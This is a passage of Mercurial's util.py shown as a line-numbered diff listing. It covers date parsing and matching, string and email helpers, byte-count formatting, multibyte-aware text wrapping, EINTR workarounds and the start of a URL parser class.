2045 2047 encoding.strfromlocal(format))
2046 2048 localunixtime = int(calendar.timegm(timetuple))
2047 2049 if offset is None:
2048 2050 # local timezone
2049 2051 unixtime = int(time.mktime(timetuple))
2050 2052 offset = unixtime - localunixtime
2051 2053 else:
2052 2054 unixtime = localunixtime + offset
2053 2055 return unixtime, offset
2054 2056
2055 2057 def parsedate(date, formats=None, bias=None):
2056 2058 """parse a localized date/time and return a (unixtime, offset) tuple.
2057 2059
2058 2060 The date may be a "unixtime offset" string or in one of the specified
2059 2061 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2060 2062
2061 2063 >>> parsedate(b' today ') == parsedate(
2062 2064 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2063 2065 True
2064 2066 >>> parsedate(b'yesterday ') == parsedate(
2065 2067 ... (datetime.date.today() - datetime.timedelta(days=1)
2066 2068 ... ).strftime('%b %d').encode('ascii'))
2067 2069 True
2068 2070 >>> now, tz = makedate()
2069 2071 >>> strnow, strtz = parsedate(b'now')
2070 2072 >>> (strnow - now) < 1
2071 2073 True
2072 2074 >>> tz == strtz
2073 2075 True
2074 2076 """
2075 2077 if bias is None:
2076 2078 bias = {}
2077 2079 if not date:
2078 2080 return 0, 0
2079 2081 if isinstance(date, tuple) and len(date) == 2:
2080 2082 return date
2081 2083 if not formats:
2082 2084 formats = defaultdateformats
2083 2085 date = date.strip()
2084 2086
2085 2087 if date == 'now' or date == _('now'):
2086 2088 return makedate()
2087 2089 if date == 'today' or date == _('today'):
2088 2090 date = datetime.date.today().strftime(r'%b %d')
2089 2091 date = encoding.strtolocal(date)
2090 2092 elif date == 'yesterday' or date == _('yesterday'):
2091 2093 date = (datetime.date.today() -
2092 2094 datetime.timedelta(days=1)).strftime(r'%b %d')
2093 2095 date = encoding.strtolocal(date)
2094 2096
2095 2097 try:
2096 2098 when, offset = map(int, date.split(' '))
2097 2099 except ValueError:
2098 2100 # fill out defaults
2099 2101 now = makedate()
2100 2102 defaults = {}
2101 2103 for part in ("d", "mb", "yY", "HI", "M", "S"):
2102 2104 # this piece is for rounding the specific end of unknowns
2103 2105 b = bias.get(part)
2104 2106 if b is None:
2105 2107 if part[0:1] in "HMS":
2106 2108 b = "00"
2107 2109 else:
2108 2110 b = "0"
2109 2111
2110 2112 # this piece is for matching the generic end to today's date
2111 2113 n = datestr(now, "%" + part[0:1])
2112 2114
2113 2115 defaults[part] = (b, n)
2114 2116
2115 2117 for format in formats:
2116 2118 try:
2117 2119 when, offset = strdate(date, format, defaults)
2118 2120 except (ValueError, OverflowError):
2119 2121 pass
2120 2122 else:
2121 2123 break
2122 2124 else:
2123 2125 raise error.ParseError(_('invalid date: %r') % date)
2124 2126 # validate explicit (probably user-specified) date and
2125 2127 # time zone offset. values must fit in signed 32 bits for
2126 2128 # current 32-bit linux runtimes. timezones go from UTC-12
2127 2129 # to UTC+14
2128 2130 if when < -0x80000000 or when > 0x7fffffff:
2129 2131 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2130 2132 if offset < -50400 or offset > 43200:
2131 2133 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2132 2134 return when, offset
2133 2135
2134 2136 def matchdate(date):
2135 2137 """Return a function that matches a given date match specifier
2136 2138
2137 2139 Formats include:
2138 2140
2139 2141 '{date}' match a given date to the accuracy provided
2140 2142
2141 2143 '<{date}' on or before a given date
2142 2144
2143 2145 '>{date}' on or after a given date
2144 2146
2145 2147 >>> p1 = parsedate(b"10:29:59")
2146 2148 >>> p2 = parsedate(b"10:30:00")
2147 2149 >>> p3 = parsedate(b"10:30:59")
2148 2150 >>> p4 = parsedate(b"10:31:00")
2149 2151 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2150 2152 >>> f = matchdate(b"10:30")
2151 2153 >>> f(p1[0])
2152 2154 False
2153 2155 >>> f(p2[0])
2154 2156 True
2155 2157 >>> f(p3[0])
2156 2158 True
2157 2159 >>> f(p4[0])
2158 2160 False
2159 2161 >>> f(p5[0])
2160 2162 False
2161 2163 """
2162 2164
2163 2165 def lower(date):
2164 2166 d = {'mb': "1", 'd': "1"}
2165 2167 return parsedate(date, extendeddateformats, d)[0]
2166 2168
2167 2169 def upper(date):
2168 2170 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2169 2171 for days in ("31", "30", "29"):
2170 2172 try:
2171 2173 d["d"] = days
2172 2174 return parsedate(date, extendeddateformats, d)[0]
2173 2175 except Abort:
2174 2176 pass
2175 2177 d["d"] = "28"
2176 2178 return parsedate(date, extendeddateformats, d)[0]
2177 2179
2178 2180 date = date.strip()
2179 2181
2180 2182 if not date:
2181 2183 raise Abort(_("dates cannot consist entirely of whitespace"))
2182 2184 elif date[0] == "<":
2183 2185 if not date[1:]:
2184 2186 raise Abort(_("invalid day spec, use '<DATE'"))
2185 2187 when = upper(date[1:])
2186 2188 return lambda x: x <= when
2187 2189 elif date[0] == ">":
2188 2190 if not date[1:]:
2189 2191 raise Abort(_("invalid day spec, use '>DATE'"))
2190 2192 when = lower(date[1:])
2191 2193 return lambda x: x >= when
2192 2194 elif date[0] == "-":
2193 2195 try:
2194 2196 days = int(date[1:])
2195 2197 except ValueError:
2196 2198 raise Abort(_("invalid day spec: %s") % date[1:])
2197 2199 if days < 0:
2198 2200 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2199 2201 % date[1:])
2200 2202 when = makedate()[0] - days * 3600 * 24
2201 2203 return lambda x: x >= when
2202 2204 elif " to " in date:
2203 2205 a, b = date.split(" to ")
2204 2206 start, stop = lower(a), upper(b)
2205 2207 return lambda x: x >= start and x <= stop
2206 2208 else:
2207 2209 start, stop = lower(date), upper(date)
2208 2210 return lambda x: x >= start and x <= stop
2209 2211
2210 2212 def stringmatcher(pattern, casesensitive=True):
2211 2213 """
2212 2214 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2213 2215 returns the matcher name, pattern, and matcher function.
2214 2216 missing or unknown prefixes are treated as literal matches.
2215 2217
2216 2218 helper for tests:
2217 2219 >>> def test(pattern, *tests):
2218 2220 ... kind, pattern, matcher = stringmatcher(pattern)
2219 2221 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2220 2222 >>> def itest(pattern, *tests):
2221 2223 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2222 2224 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2223 2225
2224 2226 exact matching (no prefix):
2225 2227 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2226 2228 ('literal', 'abcdefg', [False, False, True])
2227 2229
2228 2230 regex matching ('re:' prefix)
2229 2231 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2230 2232 ('re', 'a.+b', [False, False, True])
2231 2233
2232 2234 force exact matches ('literal:' prefix)
2233 2235 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2234 2236 ('literal', 're:foobar', [False, True])
2235 2237
2236 2238 unknown prefixes are ignored and treated as literals
2237 2239 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2238 2240 ('literal', 'foo:bar', [False, False, True])
2239 2241
2240 2242 case insensitive regex matches
2241 2243 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2242 2244 ('re', 'A.+b', [False, False, True])
2243 2245
2244 2246 case insensitive literal matches
2245 2247 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2246 2248 ('literal', 'ABCDEFG', [False, False, True])
2247 2249 """
2248 2250 if pattern.startswith('re:'):
2249 2251 pattern = pattern[3:]
2250 2252 try:
2251 2253 flags = 0
2252 2254 if not casesensitive:
2253 2255 flags = remod.I
2254 2256 regex = remod.compile(pattern, flags)
2255 2257 except remod.error as e:
2256 2258 raise error.ParseError(_('invalid regular expression: %s')
2257 2259 % e)
2258 2260 return 're', pattern, regex.search
2259 2261 elif pattern.startswith('literal:'):
2260 2262 pattern = pattern[8:]
2261 2263
2262 2264 match = pattern.__eq__
2263 2265
2264 2266 if not casesensitive:
2265 2267 ipat = encoding.lower(pattern)
2266 2268 match = lambda s: ipat == encoding.lower(s)
2267 2269 return 'literal', pattern, match
2268 2270
2269 2271 def shortuser(user):
2270 2272 """Return a short representation of a user name or email address."""
2271 2273 f = user.find('@')
2272 2274 if f >= 0:
2273 2275 user = user[:f]
2274 2276 f = user.find('<')
2275 2277 if f >= 0:
2276 2278 user = user[f + 1:]
2277 2279 f = user.find(' ')
2278 2280 if f >= 0:
2279 2281 user = user[:f]
2280 2282 f = user.find('.')
2281 2283 if f >= 0:
2282 2284 user = user[:f]
2283 2285 return user
2284 2286
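# For example:
#
#   shortuser('Foo Bar <foo.baz@example.com>')  # 'foo'
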
2285 2287 def emailuser(user):
2286 2288 """Return the user portion of an email address."""
2287 2289 f = user.find('@')
2288 2290 if f >= 0:
2289 2291 user = user[:f]
2290 2292 f = user.find('<')
2291 2293 if f >= 0:
2292 2294 user = user[f + 1:]
2293 2295 return user
2294 2296
2295 2297 def email(author):
2296 2298 '''get email of author.'''
2297 2299 r = author.find('>')
2298 2300 if r == -1:
2299 2301 r = None
2300 2302 return author[author.find('<') + 1:r]
2301 2303
2302 2304 def ellipsis(text, maxlength=400):
2303 2305 """Trim string to at most maxlength (default: 400) columns in display."""
2304 2306 return encoding.trim(text, maxlength, ellipsis='...')
2305 2307
2306 2308 def unitcountfn(*unittable):
2307 2309 '''return a function that renders a readable count of some quantity'''
2308 2310
2309 2311 def go(count):
2310 2312 for multiplier, divisor, format in unittable:
2311 2313 if abs(count) >= divisor * multiplier:
2312 2314 return format % (count / float(divisor))
2313 2315 return unittable[-1][2] % count
2314 2316
2315 2317 return go
2316 2318
2317 2319 def processlinerange(fromline, toline):
2318 2320 """Check that linerange <fromline>:<toline> makes sense and return a
2319 2321 0-based range.
2320 2322
2321 2323 >>> processlinerange(10, 20)
2322 2324 (9, 20)
2323 2325 >>> processlinerange(2, 1)
2324 2326 Traceback (most recent call last):
2325 2327 ...
2326 2328 ParseError: line range must be positive
2327 2329 >>> processlinerange(0, 5)
2328 2330 Traceback (most recent call last):
2329 2331 ...
2330 2332 ParseError: fromline must be strictly positive
2331 2333 """
2332 2334 if toline - fromline < 0:
2333 2335 raise error.ParseError(_("line range must be positive"))
2334 2336 if fromline < 1:
2335 2337 raise error.ParseError(_("fromline must be strictly positive"))
2336 2338 return fromline - 1, toline
2337 2339
2338 2340 bytecount = unitcountfn(
2339 2341 (100, 1 << 30, _('%.0f GB')),
2340 2342 (10, 1 << 30, _('%.1f GB')),
2341 2343 (1, 1 << 30, _('%.2f GB')),
2342 2344 (100, 1 << 20, _('%.0f MB')),
2343 2345 (10, 1 << 20, _('%.1f MB')),
2344 2346 (1, 1 << 20, _('%.2f MB')),
2345 2347 (100, 1 << 10, _('%.0f KB')),
2346 2348 (10, 1 << 10, _('%.1f KB')),
2347 2349 (1, 1 << 10, _('%.2f KB')),
2348 2350 (1, 1, _('%.0f bytes')),
2349 2351 )
2350 2352
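# For instance, reading the table top-down:
#
#   bytecount(100000)   # '97.7 KB'
#   bytecount(1 << 30)  # '1.00 GB'
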
2351 2353 # Matches a single EOL which can either be a CRLF where repeated CR
2352 2354 # are removed or a LF. We do not care about old Macintosh files, so a
2353 2355 # stray CR is an error.
2354 2356 _eolre = remod.compile(br'\r*\n')
2355 2357
2356 2358 def tolf(s):
2357 2359 return _eolre.sub('\n', s)
2358 2360
2359 2361 def tocrlf(s):
2360 2362 return _eolre.sub('\r\n', s)
2361 2363
2362 2364 if pycompat.oslinesep == '\r\n':
2363 2365 tonativeeol = tocrlf
2364 2366 fromnativeeol = tolf
2365 2367 else:
2366 2368 tonativeeol = pycompat.identity
2367 2369 fromnativeeol = pycompat.identity
2368 2370
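# For example:
#
#   tolf('a\r\nb\n')    # 'a\nb\n'
#   tocrlf('a\nb\n')    # 'a\r\nb\r\n'
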
2369 2371 def escapestr(s):
2370 2372 # call underlying function of s.encode('string_escape') directly for
2371 2373 # Python 3 compatibility
2372 2374 return codecs.escape_encode(s)[0]
2373 2375
2374 2376 def unescapestr(s):
2375 2377 return codecs.escape_decode(s)[0]
2376 2378
2377 2379 def forcebytestr(obj):
2378 2380 """Portably format an arbitrary object (e.g. exception) into a byte
2379 2381 string."""
2380 2382 try:
2381 2383 return pycompat.bytestr(obj)
2382 2384 except UnicodeEncodeError:
2383 2385 # non-ascii string, may be lossy
2384 2386 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2385 2387
2386 2388 def uirepr(s):
2387 2389 # Avoid double backslash in Windows path repr()
2388 2390 return repr(s).replace('\\\\', '\\')
2389 2391
2390 2392 # delay import of textwrap
2391 2393 def MBTextWrapper(**kwargs):
2392 2394 class tw(textwrap.TextWrapper):
2393 2395 """
2394 2396 Extend TextWrapper for width-awareness.
2395 2397
2396 2398 Neither the number of 'bytes' in any encoding nor the number of
2397 2399 'characters' is appropriate for calculating terminal columns.
2398 2400 
2399 2401 The original TextWrapper implementation uses the built-in 'len()'
2400 2402 directly, so overriding is needed to use the width of each character.
2401 2403 
2402 2404 In addition, characters classified as 'ambiguous' width are
2403 2405 treated as wide in East Asian locales, but as narrow in others.
2404 2406 
2405 2407 This requires a user decision to determine the width of such characters.
2406 2408 """
2407 2409 def _cutdown(self, ucstr, space_left):
2408 2410 l = 0
2409 2411 colwidth = encoding.ucolwidth
2410 2412 for i in xrange(len(ucstr)):
2411 2413 l += colwidth(ucstr[i])
2412 2414 if space_left < l:
2413 2415 return (ucstr[:i], ucstr[i:])
2414 2416 return ucstr, ''
2415 2417
2416 2418 # overriding of base class
2417 2419 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2418 2420 space_left = max(width - cur_len, 1)
2419 2421
2420 2422 if self.break_long_words:
2421 2423 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2422 2424 cur_line.append(cut)
2423 2425 reversed_chunks[-1] = res
2424 2426 elif not cur_line:
2425 2427 cur_line.append(reversed_chunks.pop())
2426 2428
2427 2429 # this overriding code is imported from TextWrapper of Python 2.6
2428 2430 # to calculate columns of string by 'encoding.ucolwidth()'
2429 2431 def _wrap_chunks(self, chunks):
2430 2432 colwidth = encoding.ucolwidth
2431 2433
2432 2434 lines = []
2433 2435 if self.width <= 0:
2434 2436 raise ValueError("invalid width %r (must be > 0)" % self.width)
2435 2437
2436 2438 # Arrange in reverse order so items can be efficiently popped
2437 2439 # from a stack of chunks.
2438 2440 chunks.reverse()
2439 2441
2440 2442 while chunks:
2441 2443
2442 2444 # Start the list of chunks that will make up the current line.
2443 2445 # cur_len is just the length of all the chunks in cur_line.
2444 2446 cur_line = []
2445 2447 cur_len = 0
2446 2448
2447 2449 # Figure out which static string will prefix this line.
2448 2450 if lines:
2449 2451 indent = self.subsequent_indent
2450 2452 else:
2451 2453 indent = self.initial_indent
2452 2454
2453 2455 # Maximum width for this line.
2454 2456 width = self.width - len(indent)
2455 2457
2456 2458 # First chunk on line is whitespace -- drop it, unless this
2457 2459 # is the very beginning of the text (i.e. no lines started yet).
2458 2460 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2459 2461 del chunks[-1]
2460 2462
2461 2463 while chunks:
2462 2464 l = colwidth(chunks[-1])
2463 2465
2464 2466 # Can at least squeeze this chunk onto the current line.
2465 2467 if cur_len + l <= width:
2466 2468 cur_line.append(chunks.pop())
2467 2469 cur_len += l
2468 2470
2469 2471 # Nope, this line is full.
2470 2472 else:
2471 2473 break
2472 2474
2473 2475 # The current line is full, and the next chunk is too big to
2474 2476 # fit on *any* line (not just this one).
2475 2477 if chunks and colwidth(chunks[-1]) > width:
2476 2478 self._handle_long_word(chunks, cur_line, cur_len, width)
2477 2479
2478 2480 # If the last chunk on this line is all whitespace, drop it.
2479 2481 if (self.drop_whitespace and
2480 2482 cur_line and cur_line[-1].strip() == r''):
2481 2483 del cur_line[-1]
2482 2484
2483 2485 # Convert current line back to a string and store it in list
2484 2486 # of all lines (return value).
2485 2487 if cur_line:
2486 2488 lines.append(indent + r''.join(cur_line))
2487 2489
2488 2490 return lines
2489 2491
2490 2492 global MBTextWrapper
2491 2493 MBTextWrapper = tw
2492 2494 return tw(**kwargs)
2493 2495
2494 2496 def wrap(line, width, initindent='', hangindent=''):
2495 2497 maxindent = max(len(hangindent), len(initindent))
2496 2498 if width <= maxindent:
2497 2499 # adjust for weird terminal size
2498 2500 width = max(78, maxindent + 1)
2499 2501 line = line.decode(pycompat.sysstr(encoding.encoding),
2500 2502 pycompat.sysstr(encoding.encodingmode))
2501 2503 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2502 2504 pycompat.sysstr(encoding.encodingmode))
2503 2505 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2504 2506 pycompat.sysstr(encoding.encodingmode))
2505 2507 wrapper = MBTextWrapper(width=width,
2506 2508 initial_indent=initindent,
2507 2509 subsequent_indent=hangindent)
2508 2510 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2509 2511
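# Illustrative (the exact output depends on the configured encoding):
#
#   wrap('one two three', 8)  # 'one two\nthree'
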
2510 2512 if (pyplatform.python_implementation() == 'CPython' and
2511 2513 sys.version_info < (3, 0)):
2512 2514 # There is an issue in CPython that some IO methods do not handle EINTR
2513 2515 # correctly. The following table shows what CPython version (and functions)
2514 2516 # are affected (buggy: has the EINTR bug, okay: otherwise):
2515 2517 #
2516 2518 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2517 2519 # --------------------------------------------------
2518 2520 # fp.__iter__ | buggy | buggy | okay
2519 2521 # fp.read* | buggy | okay [1] | okay
2520 2522 #
2521 2523 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2522 2524 #
2523 2525 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2524 2526 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2525 2527 #
2526 2528 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2527 2529 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2528 2530 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2529 2531 # fp.__iter__ but not other fp.read* methods.
2530 2532 #
2531 2533 # On modern systems like Linux, the "read" syscall cannot be interrupted
2532 2534 # when reading "fast" files like on-disk files. So the EINTR issue only
2533 2535 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2534 2536 # files approximately as "fast" files and use the fast (unsafe) code path,
2535 2537 # to minimize the performance impact.
2536 2538 if sys.version_info >= (2, 7, 4):
2537 2539 # fp.readline deals with EINTR correctly, use it as a workaround.
2538 2540 def _safeiterfile(fp):
2539 2541 return iter(fp.readline, '')
2540 2542 else:
2541 2543 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2542 2544 # note: this may block longer than necessary because of bufsize.
2543 2545 def _safeiterfile(fp, bufsize=4096):
2544 2546 fd = fp.fileno()
2545 2547 line = ''
2546 2548 while True:
2547 2549 try:
2548 2550 buf = os.read(fd, bufsize)
2549 2551 except OSError as ex:
2550 2552 # os.read only raises EINTR before any data is read
2551 2553 if ex.errno == errno.EINTR:
2552 2554 continue
2553 2555 else:
2554 2556 raise
2555 2557 line += buf
2556 2558 if '\n' in buf:
2557 2559 splitted = line.splitlines(True)
2558 2560 line = ''
2559 2561 for l in splitted:
2560 2562 if l[-1] == '\n':
2561 2563 yield l
2562 2564 else:
2563 2565 line = l
2564 2566 if not buf:
2565 2567 break
2566 2568 if line:
2567 2569 yield line
2568 2570
2569 2571 def iterfile(fp):
2570 2572 fastpath = True
2571 2573 if type(fp) is file:
2572 2574 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2573 2575 if fastpath:
2574 2576 return fp
2575 2577 else:
2576 2578 return _safeiterfile(fp)
2577 2579 else:
2578 2580 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2579 2581 def iterfile(fp):
2580 2582 return fp
2581 2583
2582 2584 def iterlines(iterator):
2583 2585 for chunk in iterator:
2584 2586 for line in chunk.splitlines():
2585 2587 yield line
2586 2588
2587 2589 def expandpath(path):
2588 2590 return os.path.expanduser(os.path.expandvars(path))
2589 2591
2590 2592 def hgcmd():
2591 2593 """Return the command used to execute current hg
2592 2594
2593 2595 This is different from hgexecutable() because on Windows we want
2594 2596 to avoid things like batch files opening new shell windows, so we
2595 2597 get either the python call or the current executable.
2596 2598 """
2597 2599 if mainfrozen():
2598 2600 if getattr(sys, 'frozen', None) == 'macosx_app':
2599 2601 # Env variable set by py2app
2600 2602 return [encoding.environ['EXECUTABLEPATH']]
2601 2603 else:
2602 2604 return [pycompat.sysexecutable]
2603 2605 return gethgcmd()
2604 2606
2605 2607 def rundetached(args, condfn):
2606 2608 """Execute the argument list in a detached process.
2607 2609
2608 2610 condfn is a callable which is called repeatedly and should return
2609 2611 True once the child process is known to have started successfully.
2610 2612 At this point, the child process PID is returned. If the child
2611 2613 process fails to start or finishes before condfn() evaluates to
2612 2614 True, return -1.
2613 2615 """
2614 2616 # Windows case is easier because the child process is either
2615 2617 # successfully starting and validating the condition or exiting
2616 2618 # on failure. We just poll on its PID. On Unix, if the child
2617 2619 # process fails to start, it will be left in a zombie state until
2618 2620 # the parent waits on it, which we cannot do since we expect a long
2619 2621 # running process on success. Instead we listen for SIGCHLD telling
2620 2622 # us our child process terminated.
2621 2623 terminated = set()
2622 2624 def handler(signum, frame):
2623 2625 terminated.add(os.wait())
2624 2626 prevhandler = None
2625 2627 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2626 2628 if SIGCHLD is not None:
2627 2629 prevhandler = signal.signal(SIGCHLD, handler)
2628 2630 try:
2629 2631 pid = spawndetached(args)
2630 2632 while not condfn():
2631 2633 if ((pid in terminated or not testpid(pid))
2632 2634 and not condfn()):
2633 2635 return -1
2634 2636 time.sleep(0.1)
2635 2637 return pid
2636 2638 finally:
2637 2639 if prevhandler is not None:
2638 2640 signal.signal(signal.SIGCHLD, prevhandler)
2639 2641
2640 2642 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2641 2643 """Return the result of interpolating items in the mapping into string s.
2642 2644
2643 2645 prefix is a single character string, or a two character string with
2644 2646 a backslash as the first character if the prefix needs to be escaped in
2645 2647 a regular expression.
2646 2648
2647 2649 fn is an optional function that will be applied to the replacement text
2648 2650 just before replacement.
2649 2651
2650 2652 escape_prefix is an optional flag that allows using doubled prefix for
2651 2653 its escaping.
2652 2654 """
2653 2655 fn = fn or (lambda s: s)
2654 2656 patterns = '|'.join(mapping.keys())
2655 2657 if escape_prefix:
2656 2658 patterns += '|' + prefix
2657 2659 if len(prefix) > 1:
2658 2660 prefix_char = prefix[1:]
2659 2661 else:
2660 2662 prefix_char = prefix
2661 2663 mapping[prefix_char] = prefix_char
2662 2664 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2663 2665 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2664 2666
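# A small illustration (the mapping and string are hypothetical); '$'
# must be escaped because it is a regex metacharacter:
#
#   interpolate(r'\$', {'user': 'alice'}, 'hello $user')  # 'hello alice'
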
2665 2667 def getport(port):
2666 2668 """Return the port for a given network service.
2667 2669
2668 2670 If port is an integer, it's returned as is. If it's a string, it's
2669 2671 looked up using socket.getservbyname(). If there's no matching
2670 2672 service, error.Abort is raised.
2671 2673 """
2672 2674 try:
2673 2675 return int(port)
2674 2676 except ValueError:
2675 2677 pass
2676 2678
2677 2679 try:
2678 2680 return socket.getservbyname(port)
2679 2681 except socket.error:
2680 2682 raise Abort(_("no port number associated with service '%s'") % port)
2681 2683
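# For example:
#
#   getport('8000')  # 8000
#   getport('http')  # 80 on typical systems, via socket.getservbyname
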
2682 2684 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2683 2685 '0': False, 'no': False, 'false': False, 'off': False,
2684 2686 'never': False}
2685 2687
2686 2688 def parsebool(s):
2687 2689 """Parse s into a boolean.
2688 2690
2689 2691 If s is not a valid boolean, returns None.
2690 2692 """
2691 2693 return _booleans.get(s.lower(), None)
2692 2694
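# For example:
#
#   parsebool('yes'), parsebool('off'), parsebool('sometimes')
#   # (True, False, None)
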
2693 2695 _hextochr = dict((a + b, chr(int(a + b, 16)))
2694 2696 for a in string.hexdigits for b in string.hexdigits)
2695 2697
2696 2698 class url(object):
2697 2699 r"""Reliable URL parser.
2698 2700
2699 2701 This parses URLs and provides attributes for the following
2700 2702 components:
2701 2703
2702 2704 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2703 2705
2704 2706 Missing components are set to None. The only exception is
2705 2707 fragment, which is set to '' if present but empty.
2706 2708
2707 2709 If parsefragment is False, fragment is included in query. If
2708 2710 parsequery is False, query is included in path. If both are
2709 2711 False, both fragment and query are included in path.
2710 2712
2711 2713 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2712 2714
2713 2715 Note that for backward compatibility reasons, bundle URLs do not
2714 2716 take host names. That means 'bundle://../' has a path of '../'.
2715 2717
2716 2718 Examples:
2717 2719
2718 2720 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2719 2721 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2720 2722 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2721 2723 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2722 2724 >>> url(b'file:///home/joe/repo')
2723 2725 <url scheme: 'file', path: '/home/joe/repo'>
2724 2726 >>> url(b'file:///c:/temp/foo/')
2725 2727 <url scheme: 'file', path: 'c:/temp/foo/'>
2726 2728 >>> url(b'bundle:foo')
2727 2729 <url scheme: 'bundle', path: 'foo'>
2728 2730 >>> url(b'bundle://../foo')
2729 2731 <url scheme: 'bundle', path: '../foo'>
2730 2732 >>> url(br'c:\foo\bar')
2731 2733 <url path: 'c:\\foo\\bar'>
2732 2734 >>> url(br'\\blah\blah\blah')
2733 2735 <url path: '\\\\blah\\blah\\blah'>
2734 2736 >>> url(br'\\blah\blah\blah#baz')
2735 2737 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2736 2738 >>> url(br'file:///C:\users\me')
2737 2739 <url scheme: 'file', path: 'C:\\users\\me'>
2738 2740
2739 2741 Authentication credentials:
2740 2742
2741 2743 >>> url(b'ssh://joe:xyz@x/repo')
2742 2744 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2743 2745 >>> url(b'ssh://joe@x/repo')
2744 2746 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2745 2747
2746 2748 Query strings and fragments:
2747 2749
2748 2750 >>> url(b'http://host/a?b#c')
2749 2751 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2750 2752 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2751 2753 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2752 2754
2753 2755 Empty path:
2754 2756
2755 2757 >>> url(b'')
2756 2758 <url path: ''>
2757 2759 >>> url(b'#a')
2758 2760 <url path: '', fragment: 'a'>
2759 2761 >>> url(b'http://host/')
2760 2762 <url scheme: 'http', host: 'host', path: ''>
2761 2763 >>> url(b'http://host/#a')
2762 2764 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2763 2765
2764 2766 Only scheme:
2765 2767
2766 2768 >>> url(b'http:')
2767 2769 <url scheme: 'http'>
2768 2770 """
2769 2771
2770 2772 _safechars = "!~*'()+"
2771 2773 _safepchars = "/!~*'()+:\\"
2772 2774 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2773 2775
2774 2776 def __init__(self, path, parsequery=True, parsefragment=True):
2775 2777 # We slowly chomp away at path until we have only the path left
2776 2778 self.scheme = self.user = self.passwd = self.host = None
2777 2779 self.port = self.path = self.query = self.fragment = None
2778 2780 self._localpath = True
2779 2781 self._hostport = ''
2780 2782 self._origpath = path
2781 2783
2782 2784 if parsefragment and '#' in path:
2783 2785 path, self.fragment = path.split('#', 1)
2784 2786
2785 2787 # special case for Windows drive letters and UNC paths
2786 2788 if hasdriveletter(path) or path.startswith('\\\\'):
2787 2789 self.path = path
2788 2790 return
2789 2791
2790 2792 # For compatibility reasons, we can't handle bundle paths as
2791 2793 # normal URLs
2792 2794 if path.startswith('bundle:'):
2793 2795 self.scheme = 'bundle'
2794 2796 path = path[7:]
2795 2797 if path.startswith('//'):
2796 2798 path = path[2:]
2797 2799 self.path = path
2798 2800 return
2799 2801
2800 2802 if self._matchscheme(path):
2801 2803 parts = path.split(':', 1)
2802 2804 if parts[0]:
2803 2805 self.scheme, path = parts
2804 2806 self._localpath = False
2805 2807
2806 2808 if not path:
2807 2809 path = None
2808 2810 if self._localpath:
2809 2811 self.path = ''
2810 2812 return
2811 2813 else:
2812 2814 if self._localpath:
2813 2815 self.path = path
2814 2816 return
2815 2817
2816 2818 if parsequery and '?' in path:
2817 2819 path, self.query = path.split('?', 1)
2818 2820 if not path:
2819 2821 path = None
2820 2822 if not self.query:
2821 2823 self.query = None
2822 2824
2823 2825 # // is required to specify a host/authority
2824 2826 if path and path.startswith('//'):
2825 2827 parts = path[2:].split('/', 1)
2826 2828 if len(parts) > 1:
2827 2829 self.host, path = parts
2828 2830 else:
2829 2831 self.host = parts[0]
2830 2832 path = None
2831 2833 if not self.host:
2832 2834 self.host = None
2833 2835 # path of file:///d is /d
2834 2836 # path of file:///d:/ is d:/, not /d:/
2835 2837 if path and not hasdriveletter(path):
2836 2838 path = '/' + path
2837 2839
2838 2840 if self.host and '@' in self.host:
2839 2841 self.user, self.host = self.host.rsplit('@', 1)
2840 2842 if ':' in self.user:
2841 2843 self.user, self.passwd = self.user.split(':', 1)
2842 2844 if not self.host:
2843 2845 self.host = None
2844 2846
2845 2847 # Don't split on colons in IPv6 addresses without ports
